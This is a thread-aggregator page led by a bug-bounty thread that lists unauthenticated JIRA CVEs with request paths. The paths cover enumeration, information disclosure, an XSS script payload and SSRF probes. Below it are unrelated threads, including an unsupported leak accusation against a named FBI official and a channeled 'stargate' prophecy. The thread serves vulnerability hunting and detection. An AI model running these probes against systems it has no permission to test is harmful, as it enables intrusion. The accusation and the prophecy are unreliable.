BC SOFTWARE

Saved by @CodyyyGardner

Harsh Bothra
@harshbothra_ 8 months, 2 weeks ago 331 views

Share See On Twitter

#Learn365 Day-4: Unauthenticated & Exploitable JIRA Vulnerabilities

There are multiple security vulnerabilities associated with the various versions of JIRA software which are exploited in wild and is one of my personal favourite 3rd Party apps to hunt.

#BugBountyTips

(1/n)

(2/n)
1. CVE-2020-14179 (Information Disclosure)
a. Navigate to /secure/QueryComponent!Default.jspa
b. It leaks information about custom fields, custom SLA, etc.

2. CVE-2020-14181 (User Enumeration)
a. Navigate to /secure/ViewUserHover.jspa?username=

(3/n)
3. CVE-2020-14178 (Project Key Enumeration)
a. Navigate to /browse.
b. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.

(4/n)
4. CVE-2019-3402 (XSS)
a. Navigate to /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search

5. CVE-2019-11581 (SSTI)
a. Navigate to /secure/ContactAdministrators!default.jspa

(5/n)
6. CVE-2019-3396 (Path Traversal)
7. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]
8. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]

(6/n)
9. CVE-2019-8449 (User Information Disclosure)
a. Navigate to /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
b. Observe that the user related information will be available.

(7/n)
10. CVE-2019-3403 (User Enumeration)
a. Navigate to /rest/api/2/user/picker?query=
b. Observe the difference in response when valid vs. invalid user is queried.

(8/n)

11. CVE-2019-8442 (Sensitive Information Disclosure)

a. Navigate to /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
b. Observe that the pom.xml file is accessible.

(n/n)
Tools: Nuclei Template can be used to automate most of these CVEs Detection.
H1 Reports:
- https://t.co/AaXKHt4NZZ
- https://t.co/hNrzpDgB5A
Blogs:
- https://t.co/ZMVc80vrYQ

More from Software

Oliver Jumpertz
@oliverjumpertz

Kubernetes vs Serverless offerings

Why would you need Kubernetes when there are offerings like Vercel, Netlify, or AWS Lambda/Amplify that basically manage everything for you and offer even more?

Well, let's try to look at both approaches and draw our own conclusions!

🧵⏬

1️⃣ A quick look at Kubernetes

Kubernetes is a container orchestrator and thus needs containers to begin with. It's a paradigm shift to more traditional software development, where components are developed, and then deployed to bare metal machines or VMs.

There are additional steps now: Making sure your application is suited to be containerized (12-factor apps, I look at you: https://t.co/nuH4dmpUmf), containerizing the application, following some pretty well-proven standards, and then pushing the image to a registry.

After all that, you need to write specs which instruct Kubernetes what the desired state of your application is, and finally let Kubernetes do its work. It's certainly not a NoOps platform, as you'll still need people knowing what they do and how to handle Kubernetes.

⏬

2️⃣ A quick look at (some!) serverless offerings

The offer is pretty simple: You write the code, the platform handles everything else for you. It's basically leaning far to the NoOps side. There is not much to manage anymore.

Take your Next.js / Nuxt.js app, point the ...

Eric Seufert
@eric_seufert

Facebook -- having taken out full-page ads in the NYT, Washington Post, and WSJ -- is generally seen as the primary victim of the new app privacy controls coming in iOS14. But Google is perhaps even more vulnerable to ATT. Why has Google remained silent? (1/X)

2/ First, background: here's a high-level overview of how ATT / IDFA deprecation impacts advertisers and ad networks, and why this whole ordeal has put advertisers and ad networks into a state of panic:

3/ Google is equally as susceptible to harm from ATT as Facebook. Google's UAC product -- esp its tROAS and tCPA campaign objectives -- relies as much on IDFA-indexed monetization and engagement data as FB's mobile product does. But Google has one big weakness wrt ATT: YouTube

4/ Broadly, view-through attribution accounts for a disproportionate % of conversions from YouTube app install impressions. This means: user sees the YT ad, doesnt click, downloads app later, & Google is able to claim it by reconciling IDFA seen at impression to IDFA seen in app

5/ View-through attribution is nonexistent in the ATT paradigm as it relies on the IDFA; some significant portion of YT's attributed conversions will evaporate. So why isnt Google vocally opposing ATT? Two reasons: consumer optics and its duality as ad network / mobile platform

Advertisement

Jarang keramas
@khvfaid

ㅤ

SHARE KOLEKSI WALLPAPER PART 2

••• A THREAD •••

ㅤ

https://t.co/vettK8txaI

https://t.co/IVbf4RTVUk

https://t.co/J3MlhTBIng

https://t.co/qaWXpsmP2E

foone
@Foone

1. in the beginning, browsers didn't have download statusbars
2. firefox got a browser statusbar extension. it was configurable and worked well
3. chrome cloned it without options and it didn't work as well

4. firefox realized chrome was faster and more secure at everything and therefore dropped extensions
5. now firefox doesn't have a download statusbar either

6. someone reimplements download statusbars in firefox's new web-extensions format. it's terrible because of the inherent limitations of the significantly less flexible and powerful extension format

7. CHROME WINS! (with its terrible download statusbar implementation which can't be fixed by users, because No Options and No Skins and No Extensions)

this is where we are now

Jack Butcher
@jackbutcher

Building Principles:

↓

1/

Value = doing things that other people don't do, won't do or can't do.

"You get paid in direct proportion to the difficulty of problems you solve" — Elon Musk

2/

Service is high-touch result generation (building experience), product is low-touch result generation (scaling experience).

3/

In a world of infinite distraction, focus is the only path to freedom.

4/

Sell time to buy experience, sell experience to buy time.

“If you don't find a way to make money while you sleep, you will work until you die.” — Warren Buffett

You May Also Like

Erik Torenberg
@eriktorenberg

1/“What would need to be true for you to….X”

Why is this the most powerful question you can ask when attempting to reach an agreement with another human being or organization?

A thread, co-written by @deanmbrody:

Next level tactic when closing a sale, candidate, or investment:

Ask: \u201cWhat needs to be true for you to be all in?\u201d

You'll usually get an explicit answer that you might not get otherwise. It also holds them accountable once the thing they need becomes true.
— Erik Torenberg (@eriktorenberg) February 27, 2018

2/ First, “X” could be lots of things. Examples: What would need to be true for you to

- “Feel it's in our best interest for me to be CMO"
- “Feel that we’re in a good place as a company”
- “Feel that we’re on the same page”
- “Feel that we both got what we wanted from this deal

3/ Normally, we aren’t that direct. Example from startup/VC land:

Founders leave VC meetings thinking that every VC will invest, but they rarely do.

Worse over, the founders don’t know what they need to do in order to be fundable.

4/ So why should you ask the magic Q?

To get clarity.

You want to know where you stand, and what it takes to get what you want in a way that also gets them what they want.

It also holds them (mentally) accountable once the thing they need becomes true.

5/ Staying in the context of soliciting investors, the question is “what would need to be true for you to want to invest (or partner with us on this journey, etc)?”

Multiple responses to this question are likely to deliver a positive result.

f1talks.pl
@f1talks

Za Robertem i jego kampanią 2019 stoją duże pieniądze? Takie głosy z padoku przekazał AMuS. Mam nadzieję, że jest w tym ziarno prawdy, bo takie wsparcie z pewnością nie zaszkodzi. #F1pl

Z drugiej strony taka plotka, na tym etapie sezonu idealnie gra z zamiarami Williamsa, żeby czekać z potwierdzeniem kierowców jak najdłużej. Taka mała powtórka z zeszłego roku... #F1pl

Advertisement

STEALTH JEFF
@drawandstrike

Andy McCabe has some explaining to do.

Andrew McCabe was reported to the FBI’s Office of Public Affairs for making an unauthorized leak of classified info to the media about @GenFlynn in early February 2017.

If you’ve wondered exactly who it was who leaked the classified info from that intelligence report on @GenFlynn’s phone calls with then-Russian ambassador Kislyak to the media, you are right now seeing a huge honking clue who it was.

To those responding to this info by sneering "Nothing's gonna happen":

Up.

Your.

Game.

You just might be too stupid to be following me.

The then-Deputy Director of the FBI get's caught targeting @GenFlynn with an illegal leak so he can 'investigated' by Peter Strzok?

Now that we know it was McCabe who set up Flynn for a fake 'perjury' investigation by his pet attack dog, Peter Strzok, the next name that's going to surface is...Joseph Pientka.

:Billy-Don :I-AM
@ValiantThor12

1) 💜 THE EVENT 2020 - THE 1221 MULTIDIMENSIONAL STARGATE 💜
PLEIADIAN LIGHT FORCES TRANSMISSIONS - 12182020
CHANNELED BY MICHAEL LOVE
A SPECIAL MESSAGE TO THE STARSEEDS OF NEW EARTH, FOR IMMEDIATE PLANETARY BROADCAST…
PRELUDE:
THE FOLLOWING INFORMATION IS DERIVED FROM DIRECT,

2) DECODED ETHERIC TRANSMISSIONS FROM BENEVOLENT LIGHT FORCES DOCKED IN EARTH’S SOLAR SYSTEM AND SOME OF THE DATA COMES DIRECTLY FROM CERTAIN INSIDE EARTH ALLIANCE MEMBERS KNOWN AS THE WHITE HATS, AND THE GREAT WHITE BROTHERHOOD STRATEGICALLY PLACED IN KEY POSITIONS OF POWER BY

3) THE GALACTICS ON THE SURFACE OF PLANET EARTH!
THE DATA HEREIN IS RECEIVED AND TRANSMITTED FROM THE 5D LEVEL! THIS MESSAGE IS INTENDED ONLY FOR THE STARSEEDS OF EARTH!
GREAT ONES,
WE HAVE SPOKEN OF THE EVENT 2020 THIS ENTIRE EARTH YEAR AS ALL PLEIADIAN AND EARTH ALLIANCE INTEL

4) SHOWS INDEED THAT A MAJOR COSMIC EVENT IS GOING TO OCCUR IN ONLY 3 EARTH DAYS FROM NOW!
ON DECEMBER 21, 2020, A MAGNIFICENT CELESTIAL STARGATE WILL OPEN IN THE HEAVENS WHICH MARKS THE DAWN OF THE NEW GOLDEN AGE OF AQUARIUS AND THE 1ST DAY OF THE SATYUGA OF CENTRAL SUNLIGHT!

5) IN THE MORNING HOURS OF THE WINTER SOLSTICE, THE LONG-AWAITED NEW ERA OF LIGHT WILL FINALLY DAWN AND THE NEW 5D EARTH WILL BE BORN!
THE COSMIC GATES WILL BE FULLY OPENED ON 12/21/20 ALLOWING POWERFUL STREAMS OF COSMIC LIGHT TO ENTER EARTH'S ATMOSPHERE, UPGRADING ALL SENTIENT

$Corey Haines \U0001f4a1$

Corey Haines 💡...
@coreyhainesco

Just finished @ryanckulp’s new course “How to Buy, Grow, and Sell Small Companies”

https://t.co/wcX0zFXHgL

Here are some main takeaways + my verdict 👇

(1) Acquisition is the easiest path to entrepreneurship

Don’t have an idea? You don’t have to have one. Buy one.

Don’t know how to code? You don’t have to. Use revenue to outsource development.

Don’t have money? You don’t have to have any. Bring in an equity partner. Leverage a debt from family/friends, tech lender, or even the seller.

Capital is not an excuse.

(2) Acquiring has a few distinct advantages to building

Namely:
- Validated demand
- Leverage debt/equity partners
- Focus on going from 1-10, not 0-1

Validate demand:

Acquiring a business that has paying customers saves you the time and energy you would have spent trying to figure out if there was demand for it in the first place.

Acquiring skips that step altogether.